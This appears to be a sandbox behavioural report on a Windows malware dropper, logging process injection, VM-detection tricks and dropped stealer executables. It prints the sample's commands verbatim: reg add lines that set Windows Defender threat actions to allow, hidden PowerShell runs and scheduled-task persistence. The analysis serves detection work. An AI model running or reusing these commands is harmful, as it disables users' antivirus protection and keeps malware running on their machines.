RegQueryValueExW June 15, 2024, 8:22 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 15, 2024, 8:22 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 15, 2024, 8:22 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 15, 2024, 8:22 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 15, 2024, 8:22 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 15, 2024, 8:22 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 15, 2024, 8:22 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 15, 2024, 8:22 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExW June 15, 2024, 8:22 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExW June 15, 2024, 8:22 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3176 called NtSetContextThread to modify thread in remote process 3232
Process injection	Process 1868 called NtSetContextThread to modify thread in remote process 2288
NtSetContextThread June 15, 2024, 8:21 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4232128 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000244 process_identifier: 3232	1	0	0
NtSetContextThread June 15, 2024, 8:22 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4232128 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000244 process_identifier: 2288	1	0	0

Powershell script adds registry entries (1 event)

cmd

powershell start-process -windowstyle hidden gpupdate.exe /force"c:\windows\system32\cmd.exe" /c forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" "c:\program files (x86)\google\chrome\application\chrome.exe" --type=gpu-process --field-trial-handle=1172,10468024286496660474,8520136674761711401,131072 --gpu-preferences=kaaaaaaaaaaabwaaaqaaaaaaaaaaagaaaqaaaaaaaaaiaaaaaaaaacgaaaaeaaaaiaaaaaaaaaaoaaaaaaaaadaaaaaaaaaaoaaaaaaaaaaqaaaaaaaaaaaaaaakaaaaeaaaaaaaaaaaaaaacwaaabaaaaaaaaaaaqaaaaoaaaaqaaaaaaaaaaeaaaalaaaa --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=cb321edecf782d156857df85be4265f2 --mojo-platform-channel-handle=1188 --ignored=" --type=renderer " /prefetch:2"c:\program files (x86)\google\chrome\application\chrome.exe" --type=watcher --main-thread-id=2644 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6"c:\users\test22\appdata\local\temp\1000017001\db324166b9.exe" "c:\users\test22\appdata\local\temp\1000064001\newkindr.exe" schtasks /create /sc minute /mo 1 /tn newkindr.exe /tr "c:\users\test22\appdata\local\temp\1000064001\newkindr.exe" /f"c:\users\test22\appdata\local\temp\9217037dc9\explortu.exe" "c:\program files (x86)\google\chrome\application\chrome.exe" --type=crashpad-handler "--user-data-dir=c:\users\test22\appdata\local\google\chrome\user data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\test22\appdata\local\google\chrome\user data\crashpad" "--metrics-dir=c:\users\test22\appdata\local\google\chrome\user data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=win64 --annotation=prod=chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef43bf1e8,0x7fef43bf1f8,0x7fef43bf208c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exec:\users\test22\appdata\local\temp\1000035001\gold.exe"c:\users\test22\appdata\local\temp\12.exe" c:\users\test22\appdata\local\temp\1000304001\b2c2c1.exec:\users\test22\appdata\local\temp\1000064001\newkindr.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" c:\users\test22\appdata\local\temp\1000063001\drivermanager.exe"c:\program files (x86)\google\chrome\application\chrome.exe" https://www.youtube.com/account"c:\users\test22\appdata\local\temp\1000016001\a2772ea559.exe" /c reg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147735503 /t reg_sz /d 6forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"c:\users\test22\appdata\local\temp\9217037dc9\explortu.exeschtasks /create /f /ru "test22" /tr "c:\programdata\mpgph131\mpgph131.exe" /tn "mpgph131 hr" /sc hourly /rl highest/c reg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147812831 /t reg_sz /d 6c:\users\test22\appdata\local\temp\1000025001\setup222.exe.\install.exe /fwdiduckaz "385134" /sc:\users\test22\appdata\local\temp\1000007001\redline123123.exec:\users\test22\appdata\local\temp\1000307001\setup.exe"c:\users\test22\appdata\local\temp\1000008001\upd.exe" c:\users\test22\1000015002\d7e4153d35.exereg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147814524 /t reg_sz /d 6chrome.exe https://www.youtube.com/account"c:\users\test22\appdata\local\temp\1000005001\judit.exe" "c:\users\test22\appdata\local\temp\1000007001\redline123123.exe" c:\users\test22\appdata\local\temp\1000306001\firstz.execmd /c forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"schtasks /create /f /ru "test22" /tr "c:\programdata\mpgph131\mpgph131.exe" /tn "mpgph131 lg" /sc onlogon /rl highestforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" "c:\users\test22\appdata\local\temp\1000047001\lummac2.exe" reg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147780199 /t reg_sz /d 6c:\users\test22\appdata\local\temp\1000017001\db324166b9.exe"c:\windows\system32\schtasks.exe" /create /sc minute /mo 1 /tn newkindr.exe /tr "c:\users\test22\appdata\local\temp\1000064001\newkindr.exe" /fc:\users\test22\appdata\local\temp\8254624243\axplong.exe/c powershell start-process -windowstyle hidden gpupdate.exe /forcec:\users\test22\appdata\local\temp\12.exereg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147812831 /t reg_sz /d 6c:\users\test22\appdata\local\temp\1000008001\upd.exec:\users\test22\appdata\local\temp\1000047001\lummac2.exe"c:\users\test22\1000015002\d7e4153d35.exe" "c:\users\test22\appdata\local\temp\1000035001\gold.exe" "c:\users\test22\appdata\local\temp\1000068001\servoces64.exe" c:\users\test22\appdata\local\temp\1000005001\judit.exereg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147735503 /t reg_sz /d 6"c:\users\test22\appdata\local\temp\1000025001\setup222.exe" "c:\users\test22\appdata\local\temp\1000063001\drivermanager.exe" "c:\users\test22\appdata\local\temp\1000307001\setup.exe" "c:\windows\system32\gpupdate.exe" /force "c:\users\test22\appdata\local\temp\1000306001\firstz.exe" c:\windows\system32\gpupdate.exe /force c:\users\test22\appdata\local\temp\1000016001\a2772ea559.exe/c reg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147780199 /t reg_sz /d 6"c:\users\test22\appdata\local\temp\1000060001\onecommander.exe" /c reg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147814524 /t reg_sz /d 6"c:\users\test22\appdata\local\temp\8254624243\axplong.exe" "c:\users\test22\appdata\local\temp\1000304001\b2c2c1.exe" c:\users\test22\appdata\local\temp\1000060001\onecommander.exe.\install.exec:\users\test22\appdata\local\temp\1000068001\servoces64.exe

One or more non-whitelisted processes were created (5 events)

parent_process	powershell.exe	martian_process	C:\Windows\System32\gpupdate.exe /force
parent_process	powershell.exe	martian_process	"C:\Windows\system32\gpupdate.exe" /force
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2644 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef43bf1e8,0x7fef43bf1f8,0x7fef43bf208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1172,10468024286496660474,8520136674761711401,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=CB321EDECF782D156857DF85BE4265F2 --mojo-platform-channel-handle=1188 --ignored=" --type=renderer " /prefetch:2

Resumed a suspended thread in a remote process potentially indicative of process injection (8 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2380 resumed a thread in remote process 2808
Process injection	Process 3176 resumed a thread in remote process 3232
Process injection	Process 3912 resumed a thread in remote process 4020
Process injection	Process 1868 resumed a thread in remote process 2288
NtResumeThread June 15, 2024, 8:21 a.m.	thread_handle: 0x0000029c suspend_count: 1 process_identifier: 2808	1	0	0
NtResumeThread June 15, 2024, 8:21 a.m.	thread_handle: 0x00000244 suspend_count: 1 process_identifier: 3232	1	0	0
NtResumeThread June 15, 2024, 8:21 a.m.	thread_handle: 0x00000360 suspend_count: 1 process_identifier: 4020	1	0	0
NtResumeThread June 15, 2024, 8:22 a.m.	thread_handle: 0x00000244 suspend_count: 1 process_identifier: 2288	1	0	0

Creates a suspicious Powershell process (5 events)

option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Uses Sysinternals tools in order to add additional command line functionality (2 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

Detects VirtualBox using WNetGetProviderName trick (1 event)

Time & API	Arguments	Status	Return	Repeated
WNetGetProviderNameW June 15, 2024, 8:21 a.m.	net_type: 0x00250000		1222	0

Detects VMWare through the in instruction feature (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 52 83 ec 04 89 24 24 81 exception.symbol: amadka+0x1fc852 exception.instruction: in eax, dx exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2082898 exception.address: 0x107c852 registers.esp: 2226220 registers.edi: 4075032 registers.eax: 1447909480 registers.ebp: 4005662740 registers.edx: 22104 registers.ebx: 1969033397 registers.esi: 17273430 registers.ecx: 20	1	0	0

Disables Windows Security features (4 events)

description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\2147735503
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\2147814524
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\2147812831
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\2147780199

Executed a process and injected code into it, probably while unpacking (50 out of 156 events)

Time & API	Arguments	Status	Return
NtResumeThread June 15, 2024, 8:20 a.m.	thread_handle: 0x000001ec suspend_count: 1 process_identifier: 2548	1	0
CreateProcessInternalW June 15, 2024, 8:20 a.m.	thread_identifier: 2832 thread_handle: 0x000003d4 process_identifier: 2828 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\9217037dc9\explortu.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\9217037dc9\explortu.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\9217037dc9\explortu.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000003dc	1	1
NtResumeThread June 15, 2024, 8:20 a.m.	thread_handle: 0x000001a0 suspend_count: 1 process_identifier: 2828	1	0
CreateProcessInternalW June 15, 2024, 8:20 a.m.	thread_identifier: 3020 thread_handle: 0x0000037c process_identifier: 3016 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\9217037dc9\explortu.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\9217037dc9\explortu.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000380	1	1
NtGetContextThread June 15, 2024, 8:20 a.m.	thread_handle: 0x0000037c	1	0
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 3016 region_size: 5447680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000380		3221225496
CreateProcessInternalW June 15, 2024, 8:21 a.m.	thread_identifier: 604 thread_handle: 0x0000047c process_identifier: 1120 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\1000015002\d7e4153d35.exe track: 1 command_line: "C:\Users\test22\1000015002\d7e4153d35.exe" filepath_r: C:\Users\test22\1000015002\d7e4153d35.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000480	1	1
CreateProcessInternalW June 15, 2024, 8:21 a.m.	thread_identifier: 2272 thread_handle: 0x00000458 process_identifier: 2268 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1000016001\a2772ea559.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000016001\a2772ea559.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000016001\a2772ea559.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000488	1	1
CreateProcessInternalW June 15, 2024, 8:21 a.m.	thread_identifier: 2764 thread_handle: 0x000003b4 process_identifier: 2380 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1000017001\db324166b9.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000017001\db324166b9.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000017001\db324166b9.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000048c	1	1
NtResumeThread June 15, 2024, 8:21 a.m.	thread_handle: 0x000001e8 suspend_count: 1 process_identifier: 1120	1	0
CreateProcessInternalW June 15, 2024, 8:21 a.m.	thread_identifier: 2256 thread_handle: 0x000003dc process_identifier: 2232 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\8254624243\axplong.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\8254624243\axplong.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\8254624243\axplong.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000003e4	1	1
NtResumeThread June 15, 2024, 8:21 a.m.	thread_handle: 0x000001a0 suspend_count: 1 process_identifier: 2232	1	0
CreateProcessInternalW June 15, 2024, 8:21 a.m.	thread_identifier: 416 thread_handle: 0x0000046c process_identifier: 776 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1000005001\judit.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000005001\judit.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000005001\judit.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000464	1	1
CreateProcessInternalW June 15, 2024, 8:21 a.m.	thread_identifier: 1576 thread_handle: 0x00000434 process_identifier: 1528 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1000007001\redline123123.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000007001\redline123123.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000007001\redline123123.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000474	1	1
CreateProcessInternalW June 15, 2024, 8:21 a.m.	thread_identifier: 2776 thread_handle: 0x0000034c process_identifier: 2780 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1000008001\upd.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000008001\upd.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000008001\upd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000468	1	1
CreateProcessInternalW June 15, 2024, 8:21 a.m.	thread_identifier: 2304 thread_handle: 0x00000440 process_identifier: 800 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1000025001\setup222.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000025001\setup222.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000025001\setup222.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000478	1	1
CreateProcessInternalW June 15, 2024, 8:21 a.m.	thread_identifier: 2112 thread_handle: 0x0000037c process_identifier: 2108 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1000035001\gold.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000035001\gold.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000035001\gold.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000488	1	1
CreateProcessInternalW June 15, 2024, 8:21 a.m.	thread_identifier: 2440 thread_handle: 0x0000047c process_identifier: 740 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1000047001\lummac2.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000047001\lummac2.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000047001\lummac2.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000488	1	1
CreateProcessInternalW June 15, 2024, 8:21 a.m.	thread_identifier: 2296 thread_handle: 0x00000470 process_identifier: 2300 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1000060001\onecommander.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000060001\onecommander.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000060001\onecommander.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000037c	1	1
CreateProcessInternalW June 15, 2024, 8:21 a.m.	thread_identifier: 3180 thread_handle: 0x0000046c process_identifier: 3176 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1000063001\drivermanager.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000063001\drivermanager.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000063001\drivermanager.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000037c	1	1
CreateProcessInternalW June 15, 2024, 8:21 a.m.	thread_identifier: 3484 thread_handle: 0x00000468 process_identifier: 3480 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000049c	1	1
